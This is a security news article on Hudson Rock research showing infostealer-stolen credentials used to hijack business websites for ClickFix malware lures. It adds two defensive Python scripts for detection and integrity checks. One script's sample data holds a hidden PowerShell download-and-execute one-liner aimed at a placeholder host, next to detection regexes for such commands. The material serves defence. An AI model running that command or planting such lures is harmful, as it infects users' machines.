Threat Actors Use Infostealers to Turn Legitimate Businesses into Malware Hosts
Recent analysis by the Hudson Rock Threat Intelligence Team reveals that attackers are using stolen credentials to commandeer authentic business websites for hosting malicious ClickFix campaigns.
The ClickFix attack technique tricks users into executing malware by mimicking trusted system interfaces like CAPTCHA verifications or browser updates.
When victims interact with these fake prompts, malicious PowerShell commands are copied to their clipboard.
Users are then instructed to paste and execute these commands through the Windows Run dialog, bypassing traditional security controls.
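The execution chain described above leaves a recognizable trace in process-creation telemetry: a command pasted into the Run dialog is launched by explorer.exe, and a one-liner meant to be pasted rather than typed tends to carry hidden-window, encoded-command or download-and-evaluate switches. The following detection logic is an added example, not code from the article or from Hudson Rock; the event format, the indicator list and its weights, and the sample events are all constructed for illustration.

```python
"""Score process-creation events for ClickFix-style execution.

Added example (not from the article). Assumes Sysmon/EDR-style events with a
parent image, an image and a command line. A shell spawned by explorer.exe
(the Run dialog's parent) that also carries paste-friendly switches scores
high; an administrator opening a plain PowerShell window from Run does not.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Generic hallmarks of a one-liner built to be pasted, each with a weight.
INDICATORS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I), 2, "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2, "invoke-expression"),
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I), 2, "download cradle"),
    (re.compile(r"-(nop|noprofile)\b", re.I), 1, "no profile"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
]
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
RUN_DIALOG_PARENT = "explorer.exe"  # Run dialog commands are children of explorer


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent):
    """Return (score, reasons); non-shell images score 0."""
    if _basename(ev.image) not in SHELLS:
        return 0, []
    score, reasons = 0, []
    if _basename(ev.parent_image) == RUN_DIALOG_PARENT:
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog / clipboard paste)")
    for pattern, weight, label in INDICATORS:
        if pattern.search(ev.command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def find_suspicious(events, threshold=5):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -nop -c "iwr http://compromised-site.invalid/v.txt | iex"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell -File C:\scripts\nightly-backup.ps1'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for ev, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"[{score}] {ev.command_line}\n    " + ", ".join(reasons))
```

The threshold deliberately sits above the parent-process signal alone, so a user who simply opens PowerShell from Run is not flagged; tune the weights against your own baseline before deploying the rule.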
Research conducted using the ClickFix Hunter platform uncovered a startling pattern: 220 out of 1,635 tracked malicious domains are legitimate business websites whose administrative credentials were previously stolen by infostealers.
This represents approximately 13% of active ClickFix infrastructure, demonstrating how victims become vectors for future attacks.
The investigation examined specific cases including jrqsistemas.com, where WordPress administrative credentials appeared in infostealer logs.
Attackers used these stolen credentials to access the legitimate website’s content management system and upload ClickFix scripts, transforming a business site into a malware distribution point.
This self-sustaining cycle operates as follows: infostealers compromise user machines and harvest credentials for website administration panels, hosting services, and content management systems.
Cybercriminals then use these stolen credentials to inject malicious code into legitimate websites. These compromised sites host new ClickFix campaigns that distribute more infostealers, perpetuating the cycle.
The approach proves particularly effective because compromised legitimate domains bypass many security filters.
Unlike newly registered domains that trigger suspicion, established business websites often maintain trusted reputations with security systems and users alike.
Security researchers emphasize that this infrastructure hijacking represents a significant shift in cybercrime economics.
Rather than purchasing domains and hosting services, which creates paper trails and incurs costs, attackers exploit stolen credentials to access existing infrastructure at no cost while maintaining operational anonymity.
Hudson Rock has released free API endpoints enabling security teams to detect whether their domains appear in infostealer logs, providing early warning of potential compromise.
According to Infostealers, the ClickFix Hunter platform integrates this intelligence to help organizations identify and remediate hijacked infrastructure.
The feedback loop highlights a critical vulnerability in modern cybersecurity: the human element combined with credential theft creates self-perpetuating attack ecosystems.
Organizations must implement comprehensive monitoring for unauthorized access to administrative systems and conduct regular credential audits to break this cycle.
Security experts recommend multi-factor authentication for all administrative access, regular monitoring of website file integrity, and employee training on recognizing social engineering tactics.
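The file-integrity monitoring recommended above can be paired with a content check for the injected ClickFix lure itself: the page copies a command to the clipboard and references PowerShell. The script below is an added example, not code from the article or from Hudson Rock; it snapshots a web root, diffs it against a saved baseline, and applies that heuristic to any added or modified page. The file extensions, the regexes and the sample pages are assumptions made for illustration.

```python
"""Web-root integrity check with a ClickFix content heuristic.

Added example (not from the article). snapshot() hashes every file under a
web root, diff_snapshots() compares two snapshots, and looks_like_clickfix()
flags page content that both writes to the clipboard and mentions a shell.
"""
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Assumed: the lure needs a clipboard write and a shell reference.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
SHELL_HINT = re.compile(r"powershell|mshta|cmd(\.exe)?\s*/c", re.I)
PAGE_SUFFIXES = {".html", ".htm", ".php", ".js"}


def snapshot(root):
    """Return {relative_posix_path: sha256_hex} for every regular file under root."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            result[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Classify paths as added, modified or removed relative to the baseline."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and baseline[p] != current[p]),
        "removed": sorted(p for p in baseline if p not in current),
    }


def looks_like_clickfix(text):
    """Heuristic: the page copies to the clipboard and references a shell."""
    return bool(CLIPBOARD_WRITE.search(text)) and bool(SHELL_HINT.search(text))


def review_changes(root, baseline):
    """Diff the live tree against the baseline and flag suspicious new/changed pages."""
    root = Path(root)
    changes = diff_snapshots(baseline, snapshot(root))
    suspects = []
    for rel in changes["added"] + changes["modified"]:
        path = root / rel
        if path.suffix.lower() in PAGE_SUFFIXES and looks_like_clickfix(path.read_text(errors="replace")):
            suspects.append(rel)
    changes["clickfix_suspects"] = suspects
    return changes


def demo():
    """Build a constructed web root, baseline it, inject a lure page, and review."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body><h1>Welcome</h1></body></html>")
        (root / "js").mkdir()
        (root / "js" / "app.js").write_text("console.log('site loaded');")
        baseline_file = root.parent / "baseline-constructed.json"
        baseline_file.write_text(json.dumps(snapshot(root)))

        # Simulated post-compromise state: a fake verification page is added
        # and the site script is modified. Command text is a placeholder.
        (root / "verify.html").write_text(
            "<div>Verify you are human</div><script>"
            "navigator.clipboard.writeText('powershell <placeholder>');</script>")
        (root / "js" / "app.js").write_text("console.log('site loaded'); // changed")

        report = review_changes(root, json.loads(baseline_file.read_text()))
        baseline_file.unlink()
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline outside the web root and refresh it only after an approved deployment, otherwise an attacker with CMS credentials can simply rewrite it along with the pages.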
As infostealers continue evolving, breaking the victim-to-vector cycle requires proactive defense strategies that address both technical vulnerabilities and human factors.
The post Threat Actors Use Infostealers to Turn Legitimate Businesses into Malware Hosts appeared first on Cyber Security News.